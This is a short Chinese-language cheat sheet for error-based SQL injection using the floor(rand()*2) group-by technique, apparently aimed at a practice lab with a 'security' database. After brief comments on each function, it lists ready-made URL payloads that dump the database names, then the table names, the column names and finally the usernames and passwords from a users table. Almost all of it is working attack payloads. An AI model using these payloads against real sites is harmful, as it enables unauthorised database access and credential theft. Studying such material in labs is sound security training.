?id=1' union select count(*),1, concat(【PAYLOAD】,0x5c, floor(rand()*2)) as a from information_schema.tables group by a --+
#count(*) //函数返回表中的记录数
# concat(【PAYLOAD】,0x5c, floor(rand()*2)) as a //该行语句定义为a
//concat( ) 连接函数
//0x5c 插入其中的分割符“\”
//floor(rand()*2 取整:0或1
//
在【PAYLOAD】处构造SQL语句,分步如下:
爆库:
?id=1' union select count(*),1, concat((select concat(schema_name,0x5c) from information_schema.schemata limit 0,1),floor(rand()*2)) as a from information_schema.tables group by a --+
爆表:
?id=1' union select count(*),1, concat((select concat(table_name,0x5c) from information_schema.tables where table_schema='security' limit 0,1),floor(rand()*2)) as a from information_schema.tables group by a --+
爆列:
?id=1' union select count(*),1, concat((select concat(column_name,';') from information_schema.columns where table_name='users' limit 0,1),floor(rand()*2)) as a from information_schema.tables group by a --+
内容:
?id=1' union select count(*),1, concat((select concat(username,0x5c,password)from users limit 0,1),0x5c, floor(rand()*2)) as a from information_schema.tables group by a --+